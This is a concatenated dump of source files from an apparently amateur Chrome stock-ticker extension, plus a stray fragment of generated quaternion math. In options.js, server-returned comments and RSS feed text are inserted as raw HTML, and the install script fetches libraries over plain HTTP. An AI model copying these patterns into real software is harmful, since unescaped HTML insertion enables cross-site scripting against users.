* - message: (string) if success is false then this will be set to
* the last issue found when validating data object.
*/
pvt.setData = function(data, broadcastData) {
// Make sure the data object is constructed properly.
var result = this.cleanData(data);
if (result.success) {
this.data = result.data;
api.broadcastUpdate(broadcastData);
}
return result;
};
/**
* Setup initial values when this factory is run for the very first time
* ever (not every time the extension loads).
*/
pvt.setup = function() {
this.setData();
var result = this.addItem({ "name": "Price", "source": "Price" });
if (!result.success)
console.log(result.message);
api.save();
};
/**
* Public api.
*/
var api = {};
api.setData = function(data, broadcastData) {
return pvt.setData(data, broadcastData);
};
api.getData = function() {
return JSON.parse(JSON.stringify(pvt.data));
};
api.setup = function() {
return pvt.setup();
}
/**
* Add a metric to be displayed when a variable is rendedred.
*
* This will trigger a variable configuration broadcast udpate.
*
* @param object item
* See pvt.cleanItem() for object details.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*/
api.addItem = function(item) {
var result = pvt.addItem(item);
if (!result.success) return result;
this.broadcastUpdate();
return { success: true, message: null }
};
/**
* Remove a metric from being displayed when a variable is rendered.
*
* This will trigger a variable configuration broadcast udpate.
*
* @param int index
* The array index of the metric to remove.
*
* @return void
*/
api.removeItem = function(index) {
pvt.data.items.splice(index, 1);
this.broadcastUpdate();
};
/**
* Broadcast that the variable display configuration was updated.
*
* Controllers may listen for this with:
* $scope.$on('variableConfigUpdate', function(event, data) {});
*
* @param object data
* An object to broadcast to the rootScope.
* - apply: (bool) true to instruct watchers that they should manually
* resync with $scope.$apply(). This may need to be done if the
* broadcast was originally triggered by chrome.storage methods. This
* is probably a hack; a better solution exists somewhere.
*/
api.broadcastUpdate = function(data) {
if (typeof(data) == 'undefined') {
data = { apply: false };
}
$rootScope.$broadcast('variableConfigUpdate', data);
};
/**
* Save the current variable display configuration to chrome storage.
*
* @param function callback
* A function callback to be invoked when save is done with arguments:
* result (object)
* - success: (bool) true if save was sucessful, false otherwise.
* - message: (string) will be set if success is false.
*/
api.save = function(callback) {
var parent = this;
chrome.storage.sync.set( {'tickerbar': this.getData()} , function() {
if (typeof(callback) != 'undefined') {
if (chrome.runtime.lastError) {
if (typeof(callback) == 'function')
callback({ success: 0, message: chrome.runtime.lastError.message });
} else {
parent.broadcastUpdate();
if (typeof(callback) == 'function')
callback({ success: 1, message: null });
}
}
});
};
// When factory is first instantiated pull the variable display
// configuration object out of chrome storage. This will result
// in a broadcast update.
chrome.storage.sync.get(['tickerbar'], function(result) {
if (chrome.runtime.lastError) {
console.log('Could not load variable config from chrome storage: ' + chrome.runetime.lastError.message);
} else {
if (typeof(result['tickerbar']) == 'undefined') {
setTimeout(function() {
api.setup();
}, 1000);
}
// @todo remove this hack after a week or so. Add buttons to manually clear var cache. Add 48 hour cache clear.
variable.removeAllCache(chrome.storage.sync);
var config = pvt.cleanData(result['tickerbar']).data;
var result = api.setData(config, { apply: true } );
if (!result.success) {
console.log('Could not apply variable config from chrome storage: ' + result.message);
console.log(config);
}
}
});
// Listen for any updates to the variable display configuration object
// in chrome storage. This should only happen if multiple browsers are
// open, or if extension code on the other side of the javascript
// firewall (popup versus options versus content) has written a change
// to storage.
chrome.storage.onChanged.addListener(function(object, namespace) {
for (key in object) {
if (key == 'tickerbar') {
var config = pvt.cleanData(object.tickerbar.newValue).data;
var result = api.setData(config, { apply: true } );
if (!result.success) {
console.log('Could not apply variable config from chrome storage: ' + result.message);
console.log(config);
}
}
}
});
return api;
}]);
<file_sep>/js/pattern/patternDirective.js
cstApp.directive('cstPatternsConfig', function() {
return {
restrict: 'E',
controller: 'patternsConfig',
replace: true,
scope: true,
templateUrl: chrome.extension.getURL('/js/pattern/template/pattern-config.html')
};
});
<file_sep>/options/options.js
var evil_global_var_comments = [];
function ajaxComments(query, callback) {
url = 'http://www.automatonsofmisery.com/chrome-stock-ticker/server/comments/index.php';
query = JSON.stringify(query);
$.post(url, { json: query }, function(response, textStatus, jqXHR) {
callback(response);
}).fail(function() {
console.log('FAIL');
});
}
function getComments(callback) {
var json = {
namespace: 'comments',
command: 'get_comments'
};
ajaxComments(json, callback);
}
function printComments() {
getComments(function(response) {
var json = JSON.parse(response);
var output = '';
for (var i in json['comments']['comments']) {
output += '<div class="comment">' + json['comments']['comments'][i]['comment'] + '</div>';
}
$('div.comment-wrapper div.comments').html(output);
});
}
function addComment(comment, callback) {
var json = {
namespace: 'comments',
command: 'add_comment',
comment: comment
};
ajaxComments(json, callback);
}
$(document).ready(function() {
$.get('http://www.automatonsofmisery.com/money/feed/', function (data) {
var output = '';
var count = 0;
$(data).find("item").each(function () {
var el = $(this);
output = output + "<h4 class=\"title\">" + el.find("title").text() + "</h4>\n";
output = output + "<div class=\"date\">" + el.find("pubDate").text() + "</div>\n";
output = output + "<div class=\"description\">" + el.find("description").text() + "</div>\n";
count++;
if (count >= 3)
return false;
});
$('div#dashboard .news .items').html(output);
});
printComments();
setInterval(function() {
printComments();
}, 30000);
$('div.comment-wrapper button').click(function() {
var comment = $('div.comment-wrapper div.comment textarea').val();
addComment(comment);
$('div.comment-wrapper div.comment textarea').val('');
setTimeout(function() {
printComments();
}, 1000);
});
});
<file_sep>/js/pattern/patternCtrl.js
cstApp.controller('patternsConfig', ['$scope', 'resource', 'patterns', function($scope, resource, patterns) {
// Provide some default patterns.
$scope.patterns = patterns.getData();
$scope.export = { pretty: false };
$scope.addPattern = { regex: '', modifiers: '', result: '' };
$scope.$on('patternsUpdate', function(event, data) {
$scope.patterns = patterns.getData();
if (data.apply) $scope.$apply();
});
$scope.add = function() {
var result = patterns.addItem({
regex: $scope.addPattern.regex,
options: $scope.addPattern.modifiers,
result: $scope.addPattern.result
});
if (!result.success) {
$('#saveConfirmPatterns').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to add pattern: '+result.message+'</div>');
} else {
$scope.addPattern = { regex: '', modifiers: '', result: '' };
}
};
$scope.remove = function(index) {
patterns.removeItem(index);
};
$scope.export = function() {
var patternsObject = JSON.stringify(patterns.getData(), null, ($scope.export.pretty * 4));
$('.cst-patterns-config .cst-import-export textarea').val(patternsObject);
}
$scope.save = function() {
var result = patterns.setPatterns($scope.patterns);
if (result.success) {
patterns.save(function(result) {
if (result.success) {
$('#saveConfirmPatterns').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Saved!</div>');
} else {
$('#saveConfirmPatterns').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
});
} else {
$('#saveConfirmPatterns').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
};
}]);
<file_sep>/js/bootstrap/bootstrapDirective.js
/**
* Include this at the top of each page.
*
* <cst-bootstrap></cst-bootstrap>
*/
cstApp.directive('cstBootstrap', function() {
return {
restrict: 'E',
controller: 'bootstrap',
replace: true,
scope: true,
templateUrl: chrome.extension.getURL('/js/bootstrap/template/bootstrap.html')
};
});
<file_sep>/scripts/install.sh
PWD=`pwd`
if [[ "$PWD" == *"/scripts" ]]; then
echo "Script must be run from repository base."
exit 1
fi
if [ -d "libs/external" ]; then
echo "Install script has already been run. Remove libs/external directory to run again."
exit 1
fi
mkdir libs/external
echo "Downloading jquery"
mkdir libs/external/jquery
curl -L --progress-bar -o libs/external/jquery/jquery.min.js http://code.jquery.com/jquery-1.8.3.min.js
echo "Downloading angularjs"
mkdir libs/external/angular
curl -L --progress-bar -o libs/external/angular/angular.min.js http://code.angularjs.org/1.2.2/angular.min.js
echo "Downloading angular-ui-utils"
cd libs/external
bower install angular-ui-utils\#v0.1.1
cd ../..
echo "Downloading bootstrap"
mkdir libs/external/bootstrap
curl -L --progress-bar -o libs/external/bootstrap/bootstrap.zip https://github.com/twbs/bootstrap/archive/v3.0.3.zip
unzip libs/external/bootstrap/bootstrap.zip -d libs/external/bootstrap > /dev/null
echo "Namespacing bootstrap css"
lessc libs/cst-bootstrap.less > libs/cst-bootstrap.css
<file_sep>/js/variable/variableCtrl.js
cstApp.controller('variable', ['$scope', 'variable', 'variableConfig', function($scope, varServ, varConfigServ) {
/**
* Provided by directive:
* $scope.variable: (string) (optional) Name of the variable.
* $scope.header: (bool) Display metric names above values.
* $scope.value: (bool) Display the metric values.
*/
$scope.bar = varConfigServ.getData();
$scope.metrics = {};
if (typeof($scope.variable) != 'undefined') {
varServ.getMetrics($scope.variable.toUpperCase(), function(metrics) {
$scope.metrics = metrics;
$scope.$apply();
});
}
$scope.$on('variableConfigUpdate', function(event, data) {
$scope.bar = varConfigServ.getData();
if (data.apply) $scope.$apply();
});
}]);
cstApp.controller('variableConfig', ['$scope', 'resource', 'variableConfig', function($scope, resource, varConfig) {
$scope.tickerbar = { items: [] };
$scope.optionsMetricNames = [{ metricIndex: '- Select Metric -', metricValue: '- Select Metric -' }];
$scope.addMetricName = '- Select Metric -';
$scope.$on('variableConfigUpdate', function(event, data) {
$scope.tickerbar = varConfig.getData();
if (data.apply) $scope.$apply();
});
$scope.$on('resourceUpdate', function() {
var data = resource.getData();
$scope.optionsMetricNames = [{ metricIndex: '- Select Metric -', metricValue: '- Select Metric -' }];
$.each(data.metrics, function(index, value) {
$scope.optionsMetricNames.push({ metricIndex: value.name, metricValue: value.name });
});
$scope.$apply();
});
$scope.itemAdd = function() {
var result = varConfig.addItem({ name: $scope.addMetricName, source: 'Metric' });
if (!result.success) {
$('#saveConfirmTickerBar').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
}
$scope.itemRemove = function(index) {
varConfig.removeItem(index);
}
$scope.save = function() {
var result = varConfig.setData($scope.tickerbar);
if (result.success) {
varConfig.save(function(result) {
if (result.success) {
$('#saveConfirmTickerBar').html('<div class="alert alert-success"><a class="close" data-dismiss="alert">x</a>Saved!</div>');
} else {
$('#saveConfirmTickerBar').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
});
} else {
$('#saveConfirmTickerBar').html('<div class="alert alert-danger"><a class="close" data-dismiss="alert">x</a>Failed to save: '+result.message+'</div>');
}
};
}]);
<file_sep>/libs/CSTResource.js
/**
* @file
* Retrieve individual and discrete pieces of information from the internet.
* A mapping between the name of a discrete piece of information (metric)
* and the URL and css selector to obtain the metric is maintained inside
* a single JSON object. Multiple metrics are mapped inside the single JSON
* object.
*
* Long term storage of this mapping and the caching if the results are
* left to the calling class.
*
* URLs may contain variables, for which the calling class is responsible
* for passing in replacement values when required.
*
* Example fetching of price and volume for a stock ticker:
* @code
* // Setup a resource object to retrieve 'price' and 'volume' data from
* // the yahoo finance page.
* var resource_obj = {
* urls: [
* { url: 'http://finance.yahoo.com/q?s=SYMBOL' }
* ],
* metrics: [
* {
* name: 'price',
* url: 'http://finance.yahoo.com/q?s=SYMBOL',
* selector: 'span.time_rtq_ticker span',
* regex: '([0-9\.]+)'
* },
* {
* name: 'volume',
* url: 'http://finance.yahoo.com/q?s=SYMBOL',
* selector: 'table#table2 tr:nth-child(3) td.yfnc_tabledata1 span'
* },
* ]
* };
* // Replace all 'SYMBOLS' in the above resource_obj urls to 'WMT' (walmart
* // stock ticker).
* var replacements = [
* { from: 'SYMBOL', to: 'WMT' }
* ];
* var resource = new CSTResource(resource_obj, null);
* resource.fetchAllMetrics(replacements, function() {
* // Fetcing metrics is an asyncronous process. Inside this callback we
* // know all metrics have been fetched and are available.
* var price = resource.cache.metrics['price'].value;
* });
* @endcode
*/
/**
* @param object resource
* A JSON object mapping metrics (a piece of information) to resources on
* the internet (resources are specified with a url and a css selector).
* @param object cache
* (optional) Preloaded cache object that contains the results of the
* previous fetching of all metrics.
*/
CSTResource = function(resource, cache) {
if (typeof(resource) == 'undefined') resource = CSTResource.getDefaultResource();
if (!this.validResource(resource)) throw 'Provided resource JSON is not valid.';
this.resource = resource;
// Store results of metric fetching.
this.cache = {
urls: {},
metrics: {}
};
if (typeof(cache) != 'undefined') this.cache.metrics = cache;
};
/**
* Fetch a URL from the internet.
*
* This is an async method call. The results will be stored in cache.
*
* @param string url
* The url to access.
* @param object params
* An object containing parameters, like:
* { name: 'name', password: '<PASSWORD>' }
* @param object callback
* A callback function. Function will be invoked when the ajax request
* has been completed.
*
* @return void
* No return value is provided, use callback function to receive the html
* returned by the ajax request.
*/
CSTResource.prototype.fetchUrl = function(url, params, callback) {
// Return the cached copy if it exists.
if (typeof(this.cache.urls[url]) != 'undefined') {
callback.call(this, this.cache.urls[url].html);
} else {
var thisCSTResource = this;
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
// Record a cached copy of the url's contents.
thisCSTResource.cache.urls[url] = {};
thisCSTResource.cache.urls[url].html = xhr.responseText;
thisCSTResource.cache.urls[url].timestamp = new Date().getTime();
callback.call(thisCSTResource, xhr.responseText);
}
}
xhr.open("GET", url, true);
xhr.send();
}
}
CSTResource.prototype.fetchAllUrls = function (replacements, callback, flush) {
var urls = this.getMetricUrls();
var fetching = urls;
for (var i=0; i<urls.length; i++) {
var url = urls[i];
var actual_url = this.replaceUrlVars(url, replacements);
this.fetchUrl(actual_url, {}, function() {
// Record the end of async call to fetch url. When the last url
// has been retrieved, and the array empty, then the callback will be
// invoked.
fetching.splice(fetching.indexOf(url), 1);
if (!fetching.length) callback.call(this, this.cache.urls);
});
}
}
/**
* Report all URLs required by all metrics in the resource.
*
* @return array
* An array of URLs.
*/
CSTResource.prototype.getMetricUrls = function() {
var urls = [];
for (var i=0; i<this.resource.metrics.length; i++) {
var metric = this.resource.metrics[i];
if ($.inArray(metric.url, urls) === -1) urls.push(metric.url);
}
return urls;
};
/**
* Report any metrics in the resource that depend on a specific url.
*
* @return array
* An array of metric objects.
*/
CSTResource.prototype.getMetricsByUrl = function(url) {
var metrics = [];
for (var i=0; i<this.resource.metrics; i++) {
var metric = this.resource.metrics[i];
if (metric.url == url) metrics.push(metric);
}
return metrics;
};
/**
* Report a metric object by specified name.
*
* @param string name
* The name of the metric.
*
* @return object|null
* The metric object which is using the name or null on not found.
*/
CSTResource.prototype.getMetricByName = function(name) {
var response = null;
for (var i=0; i<this.resource.metrics; i++) {
var metric = this.resource.metrics[i];
if (metric.name == name) {
response = metric;
break;
}
}
return response;
};
/**
* Determine if a resource JSON object is valid or not.
*
* @param object resource
* The resource JSON object to check.
*
* @return bool
* true of the object is formatted well, false othwerwise.
*/
CSTResource.prototype.validResource = function (resource) {
return true;
};
/**
* Determine if a cache JSON object is valid or not.
*
* @param object cache
* The cache JSON object to check.
*
* @return bool
* true of the object is formatted well, false othwerwise.
*/
CSTResource.prototype.validCache = function (cache) {
return true;
};
/**
* Retrieve all metric values.
*
* @param array replacements
* An array of replacement values for variables in the metric.url
* @param object callback
* A callback function to invoke when the metric has been parsed and a
* value is available.
* @param bool flush
* (optional) Flush the cache.
*
* @return void
* No return value is provided, use callback function to receive an array
* of objects conaining the metric name and retrieved value, like:
* { name: 'price', value: '92.22' }
*/
CSTResource.prototype.fetchAllMetrics = function (replacements, callback, flush) {
var thisCSTResource = this;
var fetching = this.resource.metrics.length;
for (var i=0; i<this.resource.metrics.length; i++) {
var metric = this.resource.metrics[i];
this.fetchMetric(metric, replacements, function() {
// Record the end of async call to fetch metric. When the last metric
// has been retrieved, and the array empty, then the callback will be
// invoked.
fetching = fetching - 1;
if (!fetching) callback.call(this, this.cache.metrics);
}, flush);
}
}
/**
* Retrieve metric value by accessing the metric url and using the selector.
* A cached copy of the URL and metric value will be maintained. All url
* fetches are made asyncronously.
*
* @param object metric
* The metric object to parse.
* @param array replacements
* An array of replacement values for variables in the metric.url
* @param object callback
* A callback function to invoke when the metric has been parsed and a
* value is available.
* @param bool flush
* (optional) Flush the cache.
*
* @return string
* Value found in the html document.
*/
CSTResource.prototype.fetchMetric = function (metric, replacements, callback, flush) {
if (typeof(flush) == 'undefined') flush = false;
// Get the value by fetching the url and parsing the response if it has not
// already been cached, or flush is specified, or the cache is older than
// 60 minutes.
if ((typeof(this.cache.metrics[metric.name]) == 'undefined') || flush
|| (this.cache.metrics[metric.name].timestamp + 4 * 60 * 60 * 1000) < new Date().getTime()) {
var url = this.replaceUrlVars(metric.url, replacements);
this.fetchUrl(url, {}, function(html) {
html = html.replace(/<img[^>]*>/g, '');
html = html.replace(/<script[^>]*>.*?<\/script>/g, '');
html = html.replace(/<script[^>]*>/g, '');
var value = $(html).find(metric.selector).text();
if ((typeof(metric.regex) != 'undefined') && metric.regex.length) {
var regex = new RegExp(metric.regex, 'g');
if ((match = regex.exec(value)) !== null) {
value = match[1];
}
}
this.cache.metrics[metric.name] = {};
this.cache.metrics[metric.name].value = value;
this.cache.metrics[metric.name].timestamp = new Date().getTime();
callback.call(this, value);
}, flush);
// Get the value from cache.
} else {
var value = this.cache.metrics[metric.name].value;
callback.call(this, value);
}
};
/**
* Replace varibles in URL string.
*
* Static method.
*
* @param string url
* The url to replace variables in.
* @param array replacements
* Objects containing variable names and their replacement value, like:
* { from: 'varName', to: 7 }
*
* return string
* The url with variables replaced.
*/
CSTResource.prototype.replaceUrlVars = function (url, replacements) {
for (var i=0; i<replacements.length; i++) {
var replacement = replacements[i];
url = url.replace(replacement.from, replacement.to);
}
return url;
};
/**
* Generate a default resource object.
*
* Static method.
*/
CSTResource.getDefaultResource = function () {
var resource = {
urls: [
{ url: 'http://finance.yahoo.com/q?s=SYMBOL' }
],
metrics: [
{ name: 'price', url: 'http://finance.yahoo.com/q?s=SYMBOL', selector: 'span.time_rtq_ticker span' },
{ name: 'volume', url: 'http://finance.yahoo.com/q?s=SYMBOL', selector: 'table#table2 tr:nth-child(3) td.yfnc_tabledata1 span' },
]
};
return resource;
};
<file_sep>/js/lists/listsFactory.js
/**
* @file
* All factories for use with lists of variables. A list is nothing more than
* a predefined collection of variables.
*/
cstApp.factory('lists', ['$rootScope', 'appMeta', function($rootScope, appMeta) {
/**
* Private data and methods.
*/
var pvt = {};
/**
* Ensure an individual list object contains only valid properties and
* values.
*
* If any properties contain invalid data it will be removed. If the removal
* results in an invalid item then the overall result will be considered
* a failure; the item is unusable and should be discarded by the calling
* code.
*
* @param object item
* Describes a collection of variables and meta data describing the
* collection:
* - name: (string) Name of the list.
* - variables: (array) An array of strings, each being a single
* variable.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure to clean otherwise null.
* - item: (object) will be set on success. The cleaned item. See
* @param object item for details.
*/
pvt.cleanItem = function(item) {
var name = '';
var variables = [];
if (typeof(item) != 'undefined') {
if (typeof(item.name) == 'string') name = item.name;
if (Object.prototype.toString.call(item.variables) === '[object Array]') variables = item.variables;
}
var cleanItem = {
name: name,
variables: variables,
};
if (!cleanItem.name.length)
return { success: false, message: 'Invalid item name: ' + item.name, item: cleanItem };
return { success: true, message: null, item: cleanItem };
};
/**
* Clean up the data object, or construct a new one.
*
* @param object data
* (optional) An existing data object to clean, such as one loaded
* from chrome storage, or imported via the gui. Properties:
* - loaded: (bool) true if the data object came from storage or other
* code, false if this data object is new.
* - lastSave: (int) last time this object was saved.
* - lastUpdate: (int) last time updates were checked for.
* - version: (string) application version at the time of last save.
* - autoUpdate: (bool) true if object should automatically add
* new data found in default data object or/and poll a remote source
* for updates.
* - items: (object) Container for individual collections of lists:
* - default: (array) Collection of individual lists. Each object
* defines a set of variables, with associated meta data on for
* the list itself. See cleanItem() for object details. These
* lists are only created and managed by the application.
* - custom: (array) Same as default, but created and managed by the
* end user.
*
* @return object
* An object (report) with properties:
* - success: (bool) true on if object was valid, false if object
* required cleaning.
* - message: (string) will be set to the last issue resolved if
* object requried cleaning.
* - data: (object) A lists object safe for storage and use,
* even if properties are empty. See @param data for object
* details.
*/
pvt.cleanData = function(data) {
// Default report to return.
var report = { success: true, message: null, data: null };
// Default empty object.
var cleanData = {
loaded: false,
lastSave: new Date().getTime(),
lastUpdate: 0,
version: appMeta.version,
autoUpdate: true,
useDefault: true,
items: {
default: [],
custom: []
}
};
if (typeof(data) != 'undefined') {
cleanData.loaded = true;
if (typeof(data.lastSave) != 'undefined') cleanData.lastSave = data.lastSave;
if (typeof(data.lastUpdate) == 'number') cleanData.lastUpdate = data.lastUpdate;
if (typeof(data.autoUpdate) == 'boolean') cleanData.autoUpdate = data.autoUpdate;
if (typeof(data.useDefault) == 'boolean') cleanData.useDefault = data.useDefault;
if (typeof(data.version) == 'string') cleanData.version = data.version;
// Clean items. If in invalid item is found then disregard it.
if (typeof(data.items != 'undefined')) {
for (var i in data.items) {
if (Object.prototype.toString.call(data.items[i]) === '[object Array]') {
for (var j in data.items[i]) {
var result = this.cleanItem(data.items[i][j]);
if (result.success) {
cleanData.items[i].push(result.item);
} else {
report.success = false;
report.message = result.message;
}
}
}
}
}
}
report.data = cleanData;
return report;
};
/**
* Add a list to an array of lists.
*
* @param object item
* See cleanItem() for object details.
* @param array itemList
* An array of item objects. See cleanItem() for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return object
* An object with properties:
* - success: (bool) true on success, false otherwise.
* - message: (string) will be set on failure.
*/
pvt.addItem = function(item, itemList, broadcast) {
var result = this.cleanItem(item);
if (result.success) {
itemList.push(result.item);
if (broadcast) this.broadcastUpdate();
return { success: true, message: null }
}
return result;
};
/**
* Remove a list item from an array of list of items.
*
* @param int index
* The array index of the item to remove.
* @param array itemList
* An array of item objects. See cleanItem() for object details.
* @param bool broadcast
* Set to true if a broadcast update should be issued.
*
* @return void
*
* @todo Add error checking and a normalized return object.
*/
pvt.removeItem = function(index, itemList, broadcast) {
itemList.splice(index, 1);
if (broadcast) this.broadcastUpdate();
};
/**
* Report any conflicting properties of a potential new item to an
* existing array of items.
*
* @param object item
* See cleanItem() for object details.
* @param array itemList
* An array of item objects. See cleanItem() for object details.
*
* @result object
* An object (exists) with a property for each property in the item
* object parameter (i.e: regex):
* - regex: (array) An array of objects each with the properties:
* - index: (int) The items index in the list where the conflict was
* found.
* - item: (object) The item that a property conflict was found on.
*
* Example usage:
* @code
* var result = pvt.compareItem({ regex: '[A-Z]' }, itemList);
* // Check if any dulicates on the regex pattern were found.
* if (typeof(result['regex']) != 'undefined') {
* // Remove the duplicate item from the list.
* pvt.removeItem(result['regex'][0]['index'], itemList);
* }
* @endcode
*/
pvt.compareItem = function(item, itemList) {
var exists = {};
for (var key in item) {
for (var i in itemList) {
if (item[key] == itemList[i][key]) {
if (typeof(exists[key]) == 'undefined')
exists[key] = [];
exists[key].push({ index: i, item: itemList[i] });
}
}
}
return exists;
};
/**
* Get a copy of the data object.
*
* @return object
* See cleanData() for object details.
*/
pvt.getData = function() {
return JSON.parse(JSON.stringify(this.data));
};
/**
* Broadcast that the data object was updated.
*
* Controllers may listen for this with:
* $scope.$on('linksUpdate', function(event, data) {});
*
* @param object data
* An object to broadcast to the rootScope.
* - apply: (bool) true to instruct watchers that they should manually
* resync with $scope.$apply(). This may need to be done if the
* broadcast was originally triggered by chrome.storage methods. This
* is probably a hack; a better solution exists somewhere.
*
* @return void
*/
pvt.broadcastUpdate = function(data) {
if (typeof(data) == 'undefined') {
data = { apply: false };
}
$rootScope.$broadcast('listsUpdate', data);
};
/**
* Set data object to a new value.
*
* This will trigger a broadcast update.
*
* @param object data
* see cleanData() for object details.
* @param object broadcastData
* see broadcastUpdate() for object details.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) if success is false then this will be set to
* the last issue found when validating data object.
*/
pvt.setData = function(data, broadcastData) {
// Make sure the data object is constructed properly.
var result = this.cleanData(data);
if (result.success) {
this.data = result.data;
this.broadcastUpdate(broadcastData);
}
return result;
};
/**
* Save data object to chrome storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.save = function(callback) {
// Remove angular hashes but store result as an object.
var data = JSON.parse(angular.toJson(this.data));
data.lastSave = new Date().getTime();
chrome.storage.sync.set( { 'lists': data } , function() {
if (typeof(callback) != 'undefined') {
if (chrome.runtime.lastError) {
callback({ success: 0, message: chrome.runtime.lastError.message });
} else {
callback({ success: 1, message: null });
}
}
});
};
/**
* Reset data object to the default json object file, save results to
* storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
* @param object resetData
* (optional) If provided then this object will be used to reset against
* instead of reading from the default json object file.
*
* @return void
* Callback is invoked when operation is finished with arguments:
* - result: (object) An object with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.reset = function(callback, resetData) {
parent = this;
$.get(chrome.extension.getURL('data/lists.json'), {}, function(data) {
if (typeof(resetData) != 'undefined')
data = resetData;
resetData = parent.cleanData(JSON.parse(data)).data;
var result = parent.setData(resetData, { apply: true } );
if (result.success) {
parent.save(function(result) {
callback(result);
});
}
callback(result);
});
}
/**
* Check for any remote updates to the data object and apply if found.
*
* Retrieves the update data object and updates the current.
*
* @return void
*/
pvt.update = function() {
var time = new Date().getTime();
if (time > (this.data.lastUpdate + (24 * 60 * 60 * 1000))) {
var parent = this;
$.get(chrome.extension.getURL('data/lists.json'), {}, function(data) {
if (typeof(data) != 'undefined') {
var currentData = parent.getData();
var updateData = parent.cleanData(JSON.parse(data)).data;
// Preserve custom settings.
updateData.useDefault = currentData.useDefault;
updateData.items.custom = currentData.items.custom;
updateData.lastUpdate = time;
var result = parent.setData(updateData, { apply: true } );
if (result.success) {
parent.save(function(result) {
if (result.success) {
console.log('Lists have been updated.');
} else {
console.log('Lists requires update but has failed to to save!');
}
});
} else {
console.log('Lists requires update but could not merge objects.');
}
}
});
}
};
// Load an empty (but valid) data object by default.
pvt.data = pvt.cleanData().data;
/**
* Public api.
*/
var api = {};
api.setData = function(data, broadcastData) {
return pvt.setData(data, broadcastData);
};
api.cleanData = function() {
return pvt.cleanData();
};
api.getData = function() {
return pvt.getData();
};
api.addItem = function(item) {
return pvt.addItem(item, pvt.data.items.custom, true);
};
api.removeItem = function(index) {
return pvt.removeItem(index, pvt.data.items.custom, true);
};
api.save = function(callback) {
return pvt.save(callback);
};
api.reset = function(callback, resetData) {
return pvt.reset(callback, resetData);
};
api.compareItem = function(item, itemList) {
return pvt.compareItem(item, itemList);
}
// When factory is first instantiated pull the data object out of
// chrome storage. This will result in a broadcast update.
chrome.storage.sync.get(['lists'], function(result) {
if (chrome.runtime.lastError) {
console.log('Could not load lists object from chrome storage: ' + chrome.runetime.lastError.message);
} else {
// Clean the data, ignore any warnings (offenders removed).
var data = pvt.cleanData(result['lists']).data;
var result = api.setData(data, { apply: true } );
if (!result.success) {
console.log('Could not apply lists from chrome storage: ' + result.message);
console.log(data);
} else {
if (data.autoUpdate) pvt.update();
}
}
});
// Listen for any updates to the data object in chrome storage. This
// should only happen if multiple browsers are open, or if extension code
// on the other side of the javascript firewall (popup versus options
// versus content) has written a change to storage. This will result in a
// broadcast update.
chrome.storage.onChanged.addListener(function(object, namespace) {
for (key in object) {
if (key == 'lists') {
// Clean the object, ignore any warnings (offenders removed).
var data = pvt.cleanData(object.links.newValue).data;
var result = api.setData(data, { apply: true } );
if (!result.success) {
console.log('Could not apply lists from chrome storage: ' + result.message);
console.log(data);
}
}
}
});
return api;
}]);
|
90b62f7aa8a683ab052eded1a6e37a49c4135363
|
[
"JavaScript",
"Markdown",
"Shell"
] | 17
|
JavaScript
|
BrettBiba/chrome-stock-ticker
|
8aafbe04ac80ea0932bc17b4fdc4f4f2d065370c
|
3489c8118377786ad460239c809a35ea71eb6325
|
refs/heads/master
|
<file_sep>class QuestionandanswersController < ApplicationController
def new
@qanda = Questionandanswer.new
end
def create
@qanda = Questionandanswer.new(qanda_params)
if @qanda.save
flash[:notice] = "Question Saved Successfully"
if params[:questionandanswer][:more] == '1'
redirect_to :action => 'new',:qurl => @qanda.question_url
else
redirect_to root_url
end
else
render :new
end
end
def index
@qanda = Questionandanswer.all
end
def show
@qanda = Questionandanswer.where(:question_url => params[:question_url])
end
private
def qanda_params
params.require(:questionandanswer).permit(:question_url,:question,:answer,:opt1,:opt2,:opt3,:opt4,:explanation,:more)
end
end
<file_sep>class Questionandanswer < ActiveRecord::Base
attr_accessor :more
end
<file_sep>class AddQuestionUrlQuestionAnswerOpt1Opt2Opt3Opt4ExplanationToQuestionandanswers < ActiveRecord::Migration
def change
add_column :questionandanswers, :question_url, :string
add_column :questionandanswers, :question, :string
add_column :questionandanswers, :answer, :string
add_column :questionandanswers, :opt1, :string
add_column :questionandanswers, :opt2, :string
add_column :questionandanswers, :opt3, :string
add_column :questionandanswers, :opt4, :string
add_column :questionandanswers, :explanation, :string
end
end
|
031ca9f6530a2e305653a4795cab6a52f2e3eb29
|
[
"Ruby"
] | 3
|
Ruby
|
owaiswiz/QandA
|
a3262095c138357d1e069d968a7b410e0a498f22
|
1d66f7a8490de67080289f5ca18dd20c60d35fb4
|
refs/heads/master
|
<file_sep>t2 = q0*q0;
t3 = q1*q1;
t4 = q2*q2;
t5 = q3*q3;
t6 = q0*q2*2.0;
t7 = q1*q3*2.0;
t8 = t6+t7;
t9 = q0*q3*2.0;
t13 = q1*q2*2.0;
t10 = t9-t13;
t11 = t2+t3-t4-t5;
t12 = magX*t11;
t14 = magZ*t8;
t19 = magY*t10;
t15 = t12+t14-t19;
t16 = t2-t3+t4-t5;
t17 = q0*q1*2.0;
t24 = q2*q3*2.0;
t18 = t17-t24;
t20 = 1.0/t15;
t21 = magY*t16;
t22 = t9+t13;
t23 = magX*t22;
t28 = magZ*t18;
t25 = t21+t23-t28;
t29 = t20*t25;
t26 = tan(t29);
t27 = 1.0/(t15*t15);
t30 = t26*t26;
t31 = t30+1.0;
